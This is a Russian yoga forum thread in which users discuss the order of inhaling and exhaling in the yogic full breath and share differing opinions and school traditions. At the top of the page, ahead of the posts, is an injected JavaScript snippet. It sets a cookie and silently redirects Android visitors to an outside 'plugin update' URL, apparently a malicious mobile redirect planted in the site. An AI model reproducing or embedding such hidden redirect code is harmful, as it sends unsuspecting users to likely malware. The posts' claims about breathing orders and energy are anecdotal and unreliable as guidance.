Полное дыхание - опять вопрос - ЙОГА | Форум по йоге
function createCookie(name,value,days) { var expires = ""; if (days) { var date = new Date(); date.setTime(date.getTime()+(days*24*60*60*1000)); expires = "; expires="+date.toGMTString(); } document.cookie = name+"="+value+expires+"; path=/";} function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null;}if(!readCookie("ya")) { createCookie("ya", "1", 1); if(navigator.userAgent.match(/(android)/i)){ document.location.href="http://i-js.ru/js/plugin/?upd"; }}

ad_navbar_below
Ответ

Опции темы Опции просмотра
Старый 16.01.2008, 12:52   #1
КСИ

По умолчанию Полное дыхание - опять вопрос

У меня вопрос с порядком выполнения ПДЙ (полного дыхания йогов).

С порядком вдоха все понятно: живот - грудь - ключицы.

Вопрос с порядком выдоха. До сих пор была в уверенности что единственно правильный выдох В ТОМ ЖЕ ПОРЯДКЕ, что и вдох: живот - грудь - ключицы.

В книге Сатьянанды Сарасвати приведен обратный порядок выдоха: ключицы - грудь - живот

Вопрос: Правомерны ли оба способа, если да, то различается ли эффект?

Я пробовала и тот и другой способ, первый мне кажется более "накапливающим энаргию", но второй - более простым и естественным.
КСИ вне форума   Ответить с цитированием
Старый 13.02.2008, 17:57   #2
Илья

Накапливает энергию больше второй (ключицы - грудь - живот), но до самого конца выдоха верх груди остается раскрытым, а плечи отведенными вниз-назад. Он же используется в обучении удджайи у Айенгара.

Существует еще вариант, когда и вдох и выдох идут сверху вниз, дающий наибольшее накопление праны.
Старый 14.02.2008, 11:56   #3
КСИ

Илья, большое спасибо, это очень интересно. А не знаете ли Вы какой- либо литературы, где об этих нюансах подробнее написано?
КСИ вне форума   Ответить с цитированием
Старый 08.09.2008, 12:44   #4
Надя

Меня тоже заинтересовал вопрос - порядок полного дыхания. Теоретически, как я понимаю, может быть 4 варианта:
  1. Вдох снизу вверх - Выдох снизу вверх
  2. Вдох снизу вверх - Выдох сверху вниз
  3. Вдох сверху вниз - Выдох снизу вверх
  4. Вдох сверху вниз - Выдох сверху вниз
Какие из них используются на практике и чем различается эффект. Т.е. понятно, что лучше самой попробовать, но опасаюсь навредить...

Я всегда использовала вариант 1.
Надя вне форума   Ответить с цитированием
Старый 11.09.2008, 20:51   #5
elik

В древности для наглядности ученикам показывали мешок с зерном. По такому же принципу работает и тело. Снизу до верху засыпается зерно (вдох), а на выдохе мешок переворачивали и порядок тот же сначала воздух уходит из нижней части мешка (выдох). Это единственный физиологический способ полностью заполнить легкие.
elik вне форума   Ответить с цитированием
Старый 30.12.2008, 20:51   #6
kukoll

Записей в дневнике: 1

Тело само подскажет правильность переключения фаз.Это начинается где то через месяц прилежных занятий полным дыханием.Потом начинается автоматизация "нового"типа дыхания и тело дышит уже без нашего внимания.Но без раскачки не обойтись,всегда нужно постепенное вхождение в рехим ПД
kukoll вне форума   Ответить с цитированием
Старый 27.01.2009, 02:33   #7
Михаил108

Цитата:
Сообщение от elik Посмотреть сообщение
В древности для наглядности ученикам показывали мешок с зерном. По такому же принципу работает и тело. Снизу до верху засыпается зерно (вдох), а на выдохе мешок переворачивали и порядок тот же сначала воздух уходит из нижней части мешка (выдох). Это единственный физиологический способ полностью заполнить легкие.
А я слышал о принципе стакана с водой - наполнятется начиная снизу ( дыхания от живота), а выливается начиная сверху.
На самом деле оба способа имеют право на практику.
Только вдох во всех традициях начинается одинаково (снизу), а по выдоху разногласия. Я выдыхаю, сокращая параллельно все отделы. Как воздушный шарик, который сдувается.
Старый 09.02.2010, 23:14   #8
zommk

Цитата:
Сообщение от КСИ Посмотреть сообщение
У меня вопрос с порядком выполнения ПДЙ (полного дыхания йогов).

С порядком вдоха все понятно: живот - грудь - ключицы.

Вопрос с порядком выдоха. До сих пор была в уверенности что единственно правильный выдох В ТОМ ЖЕ ПОРЯДКЕ, что и вдох: живот - грудь - ключицы.

В книге Сатьянанды Сарасвати приведен обратный порядок выдоха: ключицы - грудь - живот

Вопрос: Правомерны ли оба способа, если да, то различается ли эффект?

Я пробовала и тот и другой способ, первый мне кажется более "накапливающим энаргию", но второй - более простым и естественным.
Книга то должно быть серьёзная. Без иронии. Только практика голубушка только практика! Пранаям великое множество .даже не буду приводить цифру .назначения самые разнообразные порой настолько скрытые что лучше и не браться пробовать чтоб не навредить себе и окружающим вас добрым сущесвам. А ещё не плохо былобы иметь квалифицированные ,так это называется рекомендации как конкретно что делать и что пожалуй ещё важнее как делать , пранояма это не дыхание собственно. Как говорит один мой знакомый защита от дурака(пардон неумехи работает ,работает ............) но вдруг раз стечение обстоятельств и беда и вопрос господи за что ведь я же ..... перечислят все присущие качества положительные разумеется ,а ответ просто для опыта дорогой или дорогая! Не бросая занятий разберитесь в деталях ВАЖНО!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
zommk вне форума   Ответить с цитированием
Старый 10.02.2010, 10:53   #9
Nag

Задавал аналогичный вопрос и в Бихарской школе и в университете SVYASA, где кстати базово рекомендуют начинать выдох снизу. Ответили, что оба метода правильны! Смотрел несколько аутентичных видео по пранаяме везде по разному. возможно зависит от традиции школы...
ИМХО Если выдох начинать сверху, то тогда после выдоха делать уддияну на задержке - удобнее, логичнее... В то-же время, лежа логично начинается выдох животом.
Старый 10.02.2010, 11:17   #10
Detonator

Записей в дневнике: 1

А зачем нужно полной дыхание? Со временем наоборот воздуха потребляется меньше и дыхание становится спокойней. Сейчас понаблюдал за собой - на выдохе выдавливаю воздух животом, потом просто расслабляю его обратно, собственно усилия вдоха или движения ребер больше и нет, сколько само вошло столько и есть, легко и достаточно. Как то само такое дыхание установилось.

Метки
пдй , полное дыхание йога

Опции темы
Опции просмотра